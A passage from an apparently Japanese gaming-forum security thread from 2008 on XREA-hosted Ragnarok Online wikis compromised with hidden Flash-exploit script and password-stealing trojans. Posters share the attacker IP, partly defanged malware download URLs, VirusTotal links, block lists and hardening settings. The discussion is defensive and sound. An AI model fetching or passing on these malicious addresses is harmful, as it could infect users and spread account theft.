一時的にとはいえ開会式休みなのか新規分が発見されなかった?みたいです。

>>667 >>668
ソースでぱっと見ではshinobiの
アクセス解析かと思ったのですが違うのですね。
ホスト対策ではどうにもならない所なので
PG2でリストを作って制限できればいいのですが。

675 名前:(○口○*)さん:08/08/09 19:06 ID:W/yEfU9P0
>>673
おちついてください。

676 名前:(○口○*)さん:08/08/09 19:10 ID:gLQC0aiA0
>>673
>>669

頻繁にチェックする・ハックに迅速に対応するしかないのかね

677 名前:(○口○*)さん:08/08/09 20:56 ID:0MNaemeK0
>>674
shinobiのはアク解析。show.phpからFlashを呼びにいく。

678 名前:(○口○*)さん:08/08/09 21:09 ID:3XqyqoqC0
サイト所持者はFTPで接続して
身に覚えのない時間に更新されてるhtmlファイルがないかのチェックで大丈夫?

679 名前:(○口○*)さん:08/08/09 21:39 ID:0MNaemeK0
んだね。ソース表示して1039045744で検索でもいいけど。

680 名前:(○口○*)さん:08/08/09 21:55 ID:L1hg5O7a0
61.238.148.112 をインターネットオプションの制限サイトに加えてみた。
効果あると良いんだけど。

681 名前:(○口○*)さん:08/08/09 22:03 ID:8TaxQB2P0
これはそのページを開くとウイルスページに飛ばされるの?

682 名前:(○口○*)さん:08/08/09 22:09 ID:0MNaemeK0
scriptだから0サイズiframeと同じで表面的には見えない。
使う脆弱性はFlashPlayer。9.0.124未満なら終了。

683 名前:(○口○*)さん:08/08/10 00:12 ID:nURxai6H0
サイトのhtmlソースを直接改変って事は、閲覧時にhtmlを生成してるwikiは
今回の攻撃を免れてる率が高い?

684 名前:(○口○*)さん:08/08/10 00:21 ID:+pcfg1zy0
直接いじれるならwikiそのものも管理者と同程度にいじれるんじゃなかろうか

685 名前:(○口○*)さん:08/08/10 06:13 ID:v9kPgjRZ0
root権限を掌握されているか、それに近い状態なら、phpに直接細工をされてPukiWikiのヘッダやフッタに出力される
可能性もあるし、CSSに何かを書かれるかもしれない。
あるいは、そんな面倒な事をせずとも、ダミーのindex.htmlを設置して、攻撃サイトを読み込ませつつ本来のindex.phpへ
リダイレクトする手法を取ってくるかもしれないし。

686 名前:(○口○*)さん:08/08/10 15:23 ID:Mn9l/gmb0
xreaやばいってWikiだけ?
狩場情報ひっそりとかもやばいのかな?

687 名前:(○口○*)さん:08/08/10 15:49 ID:/a1Lr0SP0
(;´Д`)

688 名前:(○口○*)さん:08/08/10 17:54 ID:Dffgt0gD0
頼むから理解力を身につけてくれ

689 名前:まとめ臨時 ◆kJfhJwdLoM:08/08/10 19:05 ID:K1yIHZRh0
>677
つっこみありがとうございます。
swf自体がいつもの罠なのですね。その事を失念していました。

今更なのですが試しに手持ちのサイトとか複数を
pingコマンドでIPを調べてPG2でブロック設定にして
その設定にしたアドレスをロングIPアドレスに変換して直打ちしたら
読み込みに行くけど画面は白いままで履歴にはブロックと表示されました。

BS-Wikiさんと資料室さんのPG2ブロックリストには
61■238■148■112は追加されているので
これらを導入しているなら大丈夫かも…?

690 名前:まとめ臨時 ◆kJfhJwdLoM:08/08/10 19:25 ID:K1yIHZRh0
ああ・・でも今ある罠IPが変更される様な事があったり
同じ手を別会社のサーバーでやられたりとかしたら意味が無いのか…。
うーん、XREAサーバーの被害だけで済む問題だといいのですが。

現状とにかくこまめにhtmlを更新するしかないんでしょうね。

691 名前:(○口○*)さん:08/08/11 04:11 ID:MrVlTYiG0
【      気付いた日時          】先ほど
【不審なアドレスのクリックの有無 】 記憶になし
【他人にID/Passを教えた事の有無】 無
【他人が貴方のPCを使う可能性の有無】 無
【    ツールの使用の有無      】 無
【  ネットカフェの利用の有無    】 無
【     OS    】 WindowsXP Professional SP3
【使用ブラウザ 】 IE7
【WindowsUpdateの有無】 毎月更新済み
【 アンチウイルスソフト 】 Norton360Online
【その他のSecurty対策 】 無
【 ウイルススキャン結果】 カスペルスキーオンラインスキャンにて
 C:\Program Files\Siber Systems\AI RoboForm\roboform.dll に Backdoor.Win32.Rbot.sxq を検出
ウイルスバスターオンラインスキャン及びNotonでは検出できず
【スレログやテンプレを読んだか】 多少
【hosts変更】 不明
【PeerGuardian2導入】 無
【説明】
ふとカスペルスキーオンラインスキャンをかけてみたところ
ロボフォームのフォルダからBackdoor.Win32.Rbot.sxq が検出されました
ウイルスバスターオンラインスキャン及びノートンでは検出されず、カスペルスキーの誤認識かと思ったのですが
ログをよむと洒落にならない部類のウイルスのようだったので不安になりました
別PCにてパスワードは変更済みです

692 名前:(○口○*)さん:08/08/11 04:35 ID:tSE3vAQ60
誤検知じゃねーの?

693 名前:(○口○*)さん:08/08/11 06:35 ID:dSQG/s0F0
>>691
カスペ 8/11 3:11:52のパターンで、WinXP+AIロボフォーム で検知なし。
再度オンラインスキャンしてみてくれ。それで検出しなくなってたら、誤検出だったってことだろう。

694 名前:(○口○*)さん:08/08/11 06:51 ID:MrVlTYiG0
再度のオンラインスキャンの結果今度は検知されませんでした
お騒がせして申し訳ありませんでした

695 名前:(○口○*)さん:08/08/11 12:41 ID:tSE3vAQ60
XREAサポートフォーラムより

ttp://sb.xrea.com/showthread.php?t=12960
外部ユーザー様から通報いただいた1サイトのみの確認ですが、
ログから判断しますと、
スクリプト経由で書き換えられている可能性が高いと思われます。
スクリプト自体を最新にする
.htaccess に
php_flag allow_url_fopen off
php_flag allow_url_include off
php_flag register_globals off
を記述する
万全ではありませんが、下記の方法でアクセス制限をする
ttp://sb.xrea.com/showpost.php?p=77290&postcount=3
といった対策があります。
他に数サイトあるようですが、他のサイトはまだ把握しておりません。
また、最新ではないXOOPS運用サイトでもなどでも
同様の改ざんがされることを確認できております。
なお、上記PHP設定項目が旧サーバーでOnになっているサーバーは、
アップデート時にサーバー側でOffに変更させていただいております。
ttp://sb.xrea.com/showthread.php?p=83962#post83962

696 名前:(○口○*)さん:08/08/11 12:59 ID:MaYC3PEa0
CMSへの移行って一時期すごく流行ったんだが、
バージョンアップなど適切な処置を施さなかったりすると後で
痛いしっぺ返しを食らうのも事実だ。

企業で管理しているところをレンタルする方がいいのかもしれない。
もちろんその企業の質も肝心だが。

697 名前:(○口○*)さん:08/08/11 13:03 ID:tSE3vAQ60
phpBBとか入れ食いだもんなぁ

698 名前:(○口○*)さん:08/08/11 13:23 ID:f93M3FP10
>695
そこ見ると改竄喰らったのはpukiwikiで、css.php又はskin.php辺りがスクリプト経由で改竄されたっぽい。

>683
というわけで、xreaの職Wiki等、全部確認しないと不味いかもしれない。
トップページ開いて 1039045744 の記述が無ければ(今のところ)被害を免れてると考えていいと思う。

699 名前:(○口○*)さん:08/08/11 14:23 ID:F4pZuxCY0
いちおう明記しておくと、>>695のリンク先によると
(mod_rewriteによってSEO対策に)URLが〜.htmlになるような
仕掛けがあったただのpukiwikiサイトだったらしい。
だからただのHTMLファイルが書き換えられたわけではなく
>>678とかは関係なかった。

>>698
鯖の設定が絡むようだとはいえ手口が(いくつか想像はできるけど)
はっきりしない以上はpukiwikiそのものの脆弱性と考えるべきで
現時点ではxreaに限らない方がよいと思う。
もしかしたらプラグインのせいかもしれないけど。

あの書き方だとregister_globalsで汚染された変数を使ってurl_fopen等を
行ってしまったのかな?でもそんなんでPHPソース書き換えまで
できるんだろうか。


・・・セキュリティホール memoでここのスレが2chとして紹介されてた。
2chにも同じタイトルのスレがあるのかと思ってしまったw
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2008/08.html#20080810_tuiki

700 名前:(○口○*)さん:08/08/11 15:30 ID:BJx9t2WU0
2chと他のBBSとの区別が出来ないひとが、セキュリティを論じるのは怖いですね。

701 名前:(○口○*)さん:08/08/11 15:34 ID:tSE3vAQ60
( ´_ゝ`)フーン

702 名前:(○口○*)さん:08/08/11 15:34 ID:iVNTMNRS0
似たようなもの。

703 名前:(○口○*)さん:08/08/11 15:37 ID:5MHtlkRN0
別にセキュリティーを論じているサイトじゃないんだけどな
ただのリンクサイトだよ

704 名前:(○口○*)さん:08/08/11 15:49 ID:StSDYmgU0
まあmmobbsの発祥まで遡ると2chだし、別にどっちでもいいさね。

しかし、xreaが抱えてるかもしれない脆弱性が原因にしろ、pukiwikiが抱えてるかもしれない脆弱性が原因にしろ
利用者側からすれば、同じことで。

結局の所、利用者側が打てる対策としては、現時点でPG2を使って中韓台を防ぐのが一番確実って事かな。

サイト・Wiki管理者の場合は、怪しいタイムスタンプのファイル・モジュールが無いかチェック。
タイムスタンプでの判断が取れない可能性を考えると、ローカルにあるだろう
Pukiwiki等の
各種モジュールを再アップロードで上書き、ぐらいか?

なんにせよ、面倒としか言いようが無いな……

705 名前:(○口○*)さん:08/08/11 15:58 ID:0spZVVLB0
>>700
何を言うのも自由だが、あそこはかなりの有名どころだから気をつけな。

706 名前:(○口○*)さん:08/08/11 16:44 ID:tSE3vAQ60
こっちに書くの忘れてたんでコピペ。

今回XREAに仕掛けられていたのを踏んで投下されるのは
「wzcsvbxm.dll」じゃなくて信長の野望Onlineで話題になっていた(らしい)
「KernaeghDrv.dll」ね。
英Sophosの検出名「Troj/Lineag-DV」の
ttp://www.sophos.com/security/analyses/viruses-and-spyware/trojlineagdv.html
の「More Information」参照。

707 名前:(○口○*)さん:08/08/11 18:40 ID:n+QuYAra0
あそこは、実質JPCERT/CCのなかのひとのサイトなのだがな。
go.jp相手に喧嘩でも売りたいのかね。

708 名前:(○口○*)さん:08/08/11 19:51 ID:qFS31QWa0
go.jpに「2ch」と「2ch風」を区別しろってほうが無理な話だw

709 名前:(○口○*)さん:08/08/11 19:54 ID:tSE3vAQ60
というか区別しようがしまいが ど う で も い い こと。

710 名前:(○口○*)さん:08/08/11 21:41 ID:mMLNOFuW0
しかし、わざわざドメインを括弧書きで併記してる意味が無いよなぁ。

711 名前:(○口○*)さん:08/08/11 22:20 ID:nk4kmN/D0
つーか被害報告上がってる4件のサイトのうち、
Pukiwiki形式のって一つしかないんだけど。

712 名前:(○口○*)さん:08/08/11 23:21 ID:InhHVqPT0
>711
だから?

1件でも喰らってるなら安全とは言えない。
ましてや、どの穴を突かれたか確定してるわけじゃないんだし。

713 名前:(○口○*)さん:08/08/11 23:32 ID:+pJPNQdh0
>>712
うん、それで?

714 名前:(○口○*)さん:08/08/11 23:34 ID:R76qfwZv0
言葉通りじゃないの?くだらない騙りは邪魔だから消えなよ

715 名前:(○口○*)さん:08/08/12 00:13 ID:u5x31VQk0
>>712
いや、だからPukiwikiが安全だ、なんて言うつもりは無くって。
PHP使ってないサイトも同時にやられてるからさ。
なんかもっと大きな穴開いてるんじゃないかなー、と。
そうふっと思っただけ、ごめん

716 名前:(○口○*)さん:08/08/12 09:14 ID:Hoelhr400
悪魔の証明って言葉を思い出した

717 名前:(○口○*)さん:08/08/12 12:45 ID:w37pcy550
先週XREAに仕掛けられたトロイが更新。
ttp://www.virustotal.com/analisis/ccc234390e5b7a6c342d589bf2a33038
× Norton McAfee AntiVir avast AVG BitDefender ソースネクスト(笑) 他多数
これはひどい…。各社に提出済み。

718 名前:(○口○*)さん:08/08/12 12:55 ID:UpmI8YaO0
マルチか転載かもうわかんねぇ
最近、xreaスレとここが混同というか見間違えるんだよ

719 名前:(○口○*)さん:08/08/12 13:25 ID:w37pcy550
バスターが抜けてた。もちろん×。

720 名前:(○口○*)さん:08/08/12 13:57 ID:w37pcy550
>>699
(typo fixed: いちネトゲファンさん感謝)
ワロス

721 名前:(○口○*)さん:08/08/12 15:29 ID:IO4Namu40
ついさっきカスペ先生がKernaeghDrv.dllを検出\(^o^)/
自分じゃ全く踏んだ覚えないのに怖すぎるな。
しばらくはRO関係のサイトは見ないほうがいいかもなあ

722 名前:(○口○*)さん:08/08/12 15:32 ID:w37pcy550
>>721
どこかのXREAサーバで踏んだんだね。

723 名前:(○口○*)さん:08/08/12 16:53 ID:1R5trZm60
coreserver は安全なんだろうか?
XREA系の上位サーバーだが

2つほどこっちで稼動していてるWikiがあるので。
(rowiki.jpアドレス中4つがcoreserverに向いてるようだし

724 名前:(○口○*)さん:08/08/12 17:20 ID:Hoelhr400
>>723
coreでは聞いたこと無いなあ。
問題は「手口」なんだけれどね。

725 名前:(○口○*)さん:08/08/12 18:20 ID:jLTWlM7R0
typo...?

726 名前:(○口○*)さん:08/08/12 18:23 ID:KX8SR7Fv0
タイプミスを示す言葉だよ

727 名前:(○口○*)さん:08/08/12 18:23 ID:2RjReR3w0
まずぐぐれ

728 名前:(○口○*)さん:08/08/12 19:17 ID:jLTWlM7R0
そうじゃなくて、セキュリティホールmemoの人。
2ch.netって書いていたのをmmobbs.comに直したことをtypoって、苦しくないか?ってこと。

729 名前:(○口○*)さん:08/08/12 19:23 ID:PswjeVWp0
>728
>709

730 名前:(○口○*)さん:08/08/12 19:27 ID:KX8SR7Fv0
ここで叫いてないで、メールでもして本人に聞いてください

731 名前:(○口○*)さん:08/08/12 21:01 ID:RKRcVtQD0
セキュmemoが左寄りだからって、こんな目の届かないところで粘着していても見苦しいだけですよ。

732 名前:(○口○*)さん:08/08/12 21:05 ID:UpmI8YaO0
jLTWlM7R0は何か恨みでもあるのかね?
アレゲな人とか

733 名前:(○口○*)さん:08/08/12 22:33 ID:qS3WyNOG0
単に気になっただけじゃないの

734 名前:(○口○*)さん:08/08/12 22:48 ID:rHy3yVzx0
xreaのIPまとめて全部ファイアウォールに突っ込むほうが
面倒なくていいような気すらしてくるのは気のせいか…?

735 名前:(○口○*)さん:08/08/12 22:50 ID:WRYlvnR60
…?

736 名前:(○口○*)さん:08/08/12 23:02 ID:w37pcy550
>>734
誰がまとめてくれるんだ…?

737 名前:(○口○*)さん:08/08/12 23:47 ID:eVhkSLDc0
a. [JPNICハンドル] KH5915JP
g. [Organization] DIGIROCK,INC.
[最終更新] 2007/02/22 03:20:06(JST)
db-staff@nic.ad.jp
[参照] NET/59.139.29.96/27
[参照] NET/59.139.29.224/27
[参照] NET/60.32.200.64/27
[参照] NET/60.32.201.96/27
[参照] NET/125.53.24.64/27
[参照] NET/125.53.24.128/27
[参照] NET/125.53.25.0/27
[参照] NET/125.53.25.32/27
[参照] NET/125.53.25.224/27
[参照] NET/125.53.26.0/27
[参照] NET/202.229.187.24/30
[参照] NET/210.153.88.112/30
[参照] NET/210.172.108.224/27
[参照] NET/210.196.169.192/27
[参照] NET/210.196.173.48/28
[参照] NET/210.196.176.176/28
[参照] NET/210.251.253.224/27
[参照] NET/218.216.67.32/27
[参照] NET/219.101.229.128/26
[参照] NET/219.163.5.176/28
[参照] NET/219.163.200.64/26
[参照] NET/221.186.251.64/26
[参照] NET/222.227.75.0/27
[参照] NET/222.227.75.32/27
[参照] NET/222.227.75.96/27
[参照] NET/222.227.75.128/27

738 名前:(○口○*)さん:08/08/12 23:59 ID:eVhkSLDc0
>>737の補足情報。
ttp://setup.value-domain.com/index.php?p=srvip
恐らく、前述のCIDRに全部含まれている筈。

739 名前:(○口○*)さん:08/08/13 02:43 ID:C+6c64Xl0
>>738
xreaはs350ぐらいまで存在してるから、全部は載ってないみたいだなぁ

740 名前:(○口○*)さん:08/08/13 03:46 ID:iRWCUDAY0
>>734

やれば?
デジロックを全部ブロックすると
大半の職テンプレ見れなくなるけど

わかる範囲で以下だけが例外になる
・未実装Wiki
・クエスト案内所/ragfun.netミラー(ragna.infoはCORESERVER)
・弓手Wiki、マジテンプレ、NPC、セキュ
・SageWiki
・リンカーWiki
・効率Wiki

他全部XREAかCORESERVER

741 名前:(○口○*)さん:08/08/13 03:49 ID:PypKkh3m0
個人的には、FireFoxかSleipnirどっちかを導入して、標準状態では
JavaScript、ActiveX、Javaアプレット全てが無効な設定にして、
職WikiやXrea系サイトやRO関連blogなど罠が仕込まれる可能性が
高いサイトを閲覧するときは全部無効なブラウザを使う、というのを
提唱してみる。

742 名前:(○口○*)さん:08/08/13 03:57 ID:UDgDnGuc0
JavaScript、ActiveX、Javaアプレットの禁止に加えてクッキー拒否をデフォルト設定にしてる
どうしても必要なサイトだけ許可するってホワイトリスト方式

743 名前:(○口○*)さん:08/08/13 04:13 ID:iRWCUDAY0
と言うか公式サイトが罠仕込まれる時代だってのを忘れちゃいけない。
他ゲーだけど「スカッとゴルフパンヤ!」の公式に罠が仕込まれたのは新しいと思う。

外国では企業サイトの数十%が改ざんされたとか言う話もある
そんなIP帯全部をブロックするよりは
自分たちが気をつけれるべきだと思うよブラウザーを少しでも安全性高いのにするとか

いっそWeb閲覧用のMacでも入れちまえってのが個人の本音だけどな。
MacはActiveXはいまだに対応してねーし

とか思うわけよ。

第一XREAだからCORESERVERだからってはじいていたらさくらインターネットもやばくなる
(同じような脆弱性を突かれた過去がある)
そうなるとさくらまで〜っていうと(入れるのを忘れたが)アサWiki、リンカーWiki、
SageWiki及びクエスト案内所ragfun.netミラーも危険サーバーで運用とか言うことになる

他有名サイトならラグナロクネットワーク、ROM776、OWN、D-Site、アコマニなんかも見れなくなるぞ。

なんか色々含ませると自衛のほうが早いと思うんだがな

744 名前:(○口○*)さん:08/08/13 05:27 ID:tX3RK9Eh0
この手の防衛で楽しようとするのが間違いだろ、そもそも

745 名前:(○口○*)さん:08/08/13 07:03 ID:iRWCUDAY0
>>744

一番簡単な方法はあるぞ
PCをインターネットに接続せずに隔離すればいい。
ウイルスに引っかからない最良にして簡単な方法だ


俺はネットにつながらないのいやだから
自己責任の上自衛をできるだけしてるけど

746 名前:(○口○*)さん:08/08/13 08:31 ID:m/cF6nJd0
現実的なところでは、Webブラウズ専用の仮想環境を作っておくことかなあ。
もちろん簡単に初期化できるようにセットしておく。

747 名前:(○口○*)さん:08/08/13 09:22 ID:/B2lSDdf0
VMWare+Ubuntuなら無料で簡単に導入できるが、PCのスペックが低いと
仮想環境は荷が重い。
現時点の傾向だと、中華は罠を中韓台香の鯖に罠本体を置いてるから
PG2でそこらをブロックするのが現実的、となりそう。

ただUS/UKなどを使われるとか、OSがVistaとかだとちょい問題がある。
他国ドメイン使われると対策は考え直しだし、Vistaに至ってはα版の
ものしかないし。

結局いたちごっこだし、万能な対策ってのは存在しないし、結局は
各自がベターと思われる方法を見つけるしかないんだよな

748 名前:(○口○*)さん:08/08/13 09:25 ID:+0R4984z0
今はまだそれで良くても、ホスト先が現地でなくなったらアウトだよね。
アカウントハックを堂々とやる連中のことだ。次はFTPを狙ってWebスペースを
乗っ取ってくるかもしれん。

749 名前:748:08/08/13 10:11 ID:+0R4984z0
乗っ取りといっても、サイトそのものを書き換えるんじゃなくて、ファイルを
コッソリと置かれたりしたら、ハッキングの事実すら気づきにくい。

とにかく管理放置されるとリスクが高いな。

750 名前:(○口○*)さん:08/08/13 10:29 ID:dSB6fICC0
緊急(6) 重要(5)
http://www.microsoft.com/japan/technet/security/bulletin/ms08-aug.mspx

月例age

751 名前:(○口○*)さん:08/08/13 11:05 ID:UDgDnGuc0
今回は数が多いな

どれも今週には垢ハックに使われそうな予感

752 名前:(○口○*)さん:08/08/13 11:36 ID:/YYRg3sn0
【      気付いた日時          】 昨夜
【不審なアドレスのクリックの有無 】 http:■■sddjp.net■sderyop■2008-11356.jpg
【他人にID/Passを教えた事の有無】No
【他人が貴方のPCを使う可能性の有無】No
【    ツールの使用の有無      】No
【  ネットカフェの利用の有無    】 Yes
【     OS    】 XP SP2
【使用ブラウザ 】 FireFox2.0.0.16 / Jue styl(verわからず)
【WindowsUpdateの有無】 (一番最後はいつ頃か、等)
【 アンチウイルスソフト 】 NOD32
【その他のSecurty対策 】 ルータはありますg、自身の知識不足いより不明
【 ウイルススキャン結果】 カスペルスキーオンラインスキャン:定義データの更新がエラーで実行できず
               NOD32ウィルススキャン:反応なし
【スレログやテンプレを読んだか】 時間がなく、今夜読む予定
【hosts変更】無
【PeerGuardian2導入】無
【説明】
Junestyleにて閲覧中にURL画像リンクを表示。(ビューワhJuestyle標準?)
その後のレスにて「カスペに反応があった等のレスがあり、スキャン等開始しました
現状、LAN引っこ抜き+外付けHDDに必要バックアップ中。

帰省前になにやってんだ俺・・・来週戻ったらOS再インストール予定

753 名前:(○口○*)さん:08/08/13 12:05 ID:1RN6ifk20
それはこのスレでも既出の危険アドレス
ホストが中華な時点でお察し

754 名前:(○口○*)さん:08/08/13 12:06 ID:lBZUy8VH0
XREAの新型、昨夜更新。今回はリネージュ2のパス抜きの模様。
ttp://www.virustotal.com/analisis/e03e26a5993402b293ba3d3e8609a8c0

755 名前:(○口○*)さん:08/08/13 16:53 ID:ZMluNJpc0
仮想環境でのWeb閲覧なら、ZoneAlarmのForceFiledはどうだろうか?
謡い文句通りなら、仮想PCの導入より敷居は低くて同等になるかも。

ttp://internet.watch.impress.co.jp/cda/news/2008/07/30/20431.html

ただ、何をどうやって仮想化なのか、よく分からんのだが……

ただ、何をどうやって仮想化なのか、よく分からんのだが……

ただ、何をどうやって仮想化なのか、よく分からんのだが……

756 名前:(○口○*)さん:08/08/13 17:06 ID:UDgDnGuc0
ForceFiledだと3回の攻撃で無力化してしまうのだろうか

とか変なことを思ってしまった

757 名前:(○口○*)さん:08/08/13 17:19 ID:+0R4984z0
>>755
よくわからんが、仮想環境みたいなものに閉じこめちゃうのかなあ?
そうしたら、悪意のあるプログラムであってもその外には出てこれない。

758 名前:(○口○*)さん:08/08/13 17:34 ID:UDgDnGuc0
JavaScriptを仮想ブラウザ内で実行して、その結果をスキャン
安全なら本来のブラウザに渡すって感じの処理かなーとは思ったが
これだと穴があるし IE以外は未サポートとかになるな

759 名前:(○口○*)さん:08/08/13 17:55 ID:4kkyE/eP0
また。薬屋k

760 名前:(○口○*)さん:08/08/13 18:18 ID:V9eu5o1k0
未だに何が原因かよく分からないのが気持ち悪いんだよな>XREA
「phpの穴」という鯖屋の主張がいまひとつ腑に落ちない。

761 名前:(○口○*)さん:08/08/13 18:22 ID:PypKkh3m0
これをやるとすれば、Windowsから見ればアプリケーション層で動作する
仮想OSとセットになったWebブラウザ、みたいな実装にしないと
いけない。
これだと仮想OS側ではクライアントサイドスクリプトだのレンダリングだの
ActiveXだのは自前で実装してないといけない(ホスト側の機能を流用すると
そこを経由してホスト側にもれてしまって仮想環境の意味がない)ので、
最近のActiveXやJavaScriptがあって当然なWebにおいては難しい気が
する。

仮想環境のセキュリティ的な強みは「仮想環境の外からは自由に触れるけど
仮想環境の中からは自分が仮想環境であることがわからないし、仮想環境の
中からホストへのアクセスもできない(ホストから取りに行くことはできる)」
ということで、これはつまり、利便性が低いという弱みでもあるんだよな。

だから、どうしてもホストと仮想環境の間にはVMWareとかVirtualPCみたいな
「中からは自分が仮想環境であることが基本的にわかりません」ってものを
用意してもうワンレイヤ噛ませないと、仮想環境のセキュリティ的な強みを
享受することは非常に難しい。


実物触ったわけでもないし、記事とプレスリリースだけでの判断なんだけど、
こんなふうに思った。

762 名前:(○口○*)さん:08/08/13 18:31 ID:dSB6fICC0
ブラウザやPFWだけでは限界があるし、他の方法も併用する事によって安全への担保を高めていかないと駄目だな。
例えば、HIPSとしては有名どころのUnleak。 -> ttp://soft3304.net/Unleak/
レジストリの変更操作を監視する事によって、検知をすり抜けたマルウェアの改竄動作を水際で食い止めるのに役立つ。

また、M$製品以外の脆弱性を見つけるのに有用なソフトもある。
Secunia PSI -> ttps://psi.secunia.com/
M$が提供しているMBSAというセキュリティアナライザがあるが、上記のものはサードパーティ全般を対象に拡げたようなソフト。
インストールしたまま塩漬けにされていたり、何らかの理由で脆弱性を抱えたままのコンポーネントを見つけ出すのに有用。

763 名前:(○口○*)さん:08/08/13 18:55 ID:rthokXPV0
ZAのは説明読む限り、眉唾な感じが拭えないなぁ
体験版があるなら仮想PCに入れて試すんだが

あの説明見る限り、OSに食い込むとも思えないどころか、nProのような
動作をする気がしてならない

764 名前:(○口○*)さん:08/08/14 00:03 ID:7qBb8GBx0
あやしいURL踏んじゃってカスペでオンラインスキャンかけたら
1個も引っかからなかったんだけどせふせふかな?

765 名前:(○口○*)さん:08/08/14 00:06 ID:mJwgxW/J0
ん〜とね、えへへ…


しるか

766 名前:(○口○*)さん:08/08/14 00:14 ID:EFjinR5E0
もう日が変わったけど、13日は8月のWUの日でしたので、age
ttp://www.microsoft.com/japan/technet/security/bulletin/ms08-aug.mspx

緊急が6、重要が5とかなり件数多いので、忘れずに当てましょう

767 名前:(○口○*)さん:08/08/14 00:19 ID:EFjinR5E0
>764
カスペのオンラインスキャンで見つからなかった場合
「チェックした時点のパターンファイルでは発見しなかった」だけ。

パターンが更新された結果、後になって検出される事だってある。

768 名前:(○口○*)さん:08/08/14 15:07 ID:7tAUkugj0
アトラクセンター入ると
ゲーム起動   ゲームを起動します。
ってのがもう書いて有るね。

bt_function_01.jpgはまだ見えないけど、
ゲーム
起動
になってる。

ブラウザログイン案外早く来るかも。

769 名前:(○口○*)さん:08/08/14 15:10 ID:BxZh7Tdf0
ROじゃない他のゲームはブラウザログインへの移行が早い

770 名前:(○口○*)さん:08/08/14 15:17 ID:UoWb0Riv0
ログイン画面すっ飛ばされるようになると、蔵終了しなくても
別のワールドグループに移れるようになるのかな?ならないか。

771 名前:(○口○*)さん:08/08/15 05:50 ID:V1qjlKSB0
ローグテンプレの一言情報の所に
ウィルスバスタがTSPY_GAMEOL.TO検出 SYSTEM32以下のLoveFly?.dll注意
と書いてあったのですがこれはどういう意味なんでしょうか

772 名前:(○口○*)さん:08/08/15 09:00 ID:uZ9g+SNV0
悪意のある改ざんが見受けられたので気をつけてねと意訳
とりあえずTSPY_GAMEOL.TOで検索してください

ま、安全のためウイルススキャンかければいいよ。

773 名前:(○口○*)さん:08/08/15 09:12 ID:cCPPC2fx0
ウィルス広告にでも当たった人がテンプレ自体が危険と早とちりして騒いでるんじゃ。

774 名前:(○口○*)さん:08/08/15 09:32 ID:cTAYtZn70
ローグテンプレはamazonのはあるけどXREAの広告はないね。
でも、ちょっとあの書き込みだけじゃなんともわからんね。

775 名前:(○口○*)さん:08/08/15 09:52 ID:uZ9g+SNV0
「Windows Update」のエラー報告が急増中、原因はウイルス
http://itpro.nikkeibp.co.jp/article/NEWS/20080814/312758/

>「Windows Defenderで検出しても、『無視(Ignore)』を選択するユーザーは少なくないようだ」
道具を正しく使えないなら、導入しても意味ないんだよな。

776 名前:(○口○*)さん:08/08/15 14:14 ID:uZ9g+SNV0
なんか面白そうなツールみっけたよ。セキュ対策や実験に使える?

http://dsas.blog.klab.org/archives/51301907.html
「WinAmulet」は Windows 2000 SP4 以上の 32ビット Windows 環境で動作するプログラムです。
次のような特長があります。
* 所定のフォルダへのアクセスを許可するプログラムを自分で指定可能
* 許可していないプログラムからのアクセスは報告・記録される
* 不許可のアクセス要求はプログラム側が意識しないまま透過的にダミーフォルダへリダイレクトされる

777 名前:(○口○*)さん:08/08/15 17:28 ID:dnsGPZPL0
XREAトロイ、深夜に更新されていたみたい。
ttp://www.virustotal.com/analisis/9eaa00549133a784be795e360dd56c9e
今回はNortonとBitDefenderががんばりました。

778 名前:(○口○*)さん:08/08/17 11:43 ID:qKsvi8mq0
mixiに貼られていたもの。まず確実にアカハックと思われるので検体確認まではやっていません。
−−−−−

未知 2008年08月17日 01:05 %

【RO】ネカフェDボス部屋に行ってみたhttp://www■cyokinde■com/gungho08/ro/10155326p■rar

779 名前:(○口○*)さん:08/08/17 11:48 ID:qKsvi8mq0
8/15時点で、28/36が検出。カスペ検出名「Trojan.Win32.Inject.dzc」でした。

http://www.virustotal.com/reanalisis.html?6cd43268dfec1d169819246513b624cc

780 名前:(○口○*)さん:08/08/17 13:31 ID:GFW+tZuu0
ガンホー08ワロス

781 名前:(○口○*)さん:08/08/17 13:40 ID:GFW+tZuu0
ノートンに送りました

782 名前:(○口○*)さん:08/08/17 14:20 ID:9BCSUhMQ0
今AVGって死んでる?
Binファイルが見つかりませんって出てアップデートできないけど、
自分のだけかな?
同じ症状になってる人いませんか?

783 名前:(○口○*)さん:08/08/17 14:29 ID:oSAflL8m0
Ro内での取引でID,PASSを抜かれることはあるのでしょうか・・?

784 名前:(○口○*)さん:08/08/17 14:30 ID:qKsvi8mq0
>>782
他のスレでもそんな書き込みを見ましたね。手動でファイル落としてきてアップデートかけてもだめかな?

785 名前:(○口○*)さん:08/08/17 14:30 ID:qKsvi8mq0
>>783
原理的にありえません。(RO内ではID、PASSの情報は流れません)

786 名前:(○口○*)さん:08/08/17 14:35 ID:oSAflL8m0
>>785
そうですよね。ありがとうございます。

787 名前:(○口○*)さん:08/08/17 14:51 ID:9BCSUhMQ0
>>784
手動でアップデートしようとAVGのサイトに行ったら、
何か物凄く重くサイト自体がなかなか開かなかったです。
何とかダウンロードしてアップデートはできたですが、こういうことはよくあるのかな?
とにかく最新状態にできたので一安心です。
ありがとうございました。

788 名前:(○口○*)さん:08/08/17 15:43 ID:qKsvi8mq0
>>787
つまり、サイトが重い時は、アップデートに失敗するってことだろうに。

789 名前:(○口○*)さん:08/08/17 17:14 ID:bSUg7a190
AVGは向こうがミスったようで、アップデート出来ない状態になってるみたいですね。
binが見つからないと出て、アップデート出来ない状況のようです。

セキュ板のAVGスレ
ttp://pc11.2ch.net/test/read.cgi/sec/1218168899/

790 名前:(○口○*)さん:08/08/17 23:59 ID:+pq1ZTdH0
>>779に書かれているURLから該当ファイルだけDLしたんだけど
書庫の内容確認だけなら感染しないよね?
ファイル解凍もexeの起動もしてません。

初心者な質問ですまんです

791 名前:(○口○*)さん:08/08/18 00:17 ID:qtdIHVK/0
そういうレベルの人は検体に手出すべきじゃないと思うよまじで。

792 名前:(○口○*)さん:08/08/18 00:25 ID:AR4uZqKx0
>>791の言うとおり。なにをやったら動作するのかを理解できてない人は手を出すのが間違い。

内容確認(いわば書庫の一部を開いている)の為にどんな方式で展開したのか、
拡張子偽装ファイルではないのかなど考えることは幾つかあるからな。

自己責任で判断して、行動できるようになるまでは手を出すんじゃないよ。

# メモリに展開するだけで影響が皆無とは言いがたいからな。ま、まず大丈夫だが、保証はしない。
# 気になるようなら、OSの再インストールでもやっとけ。

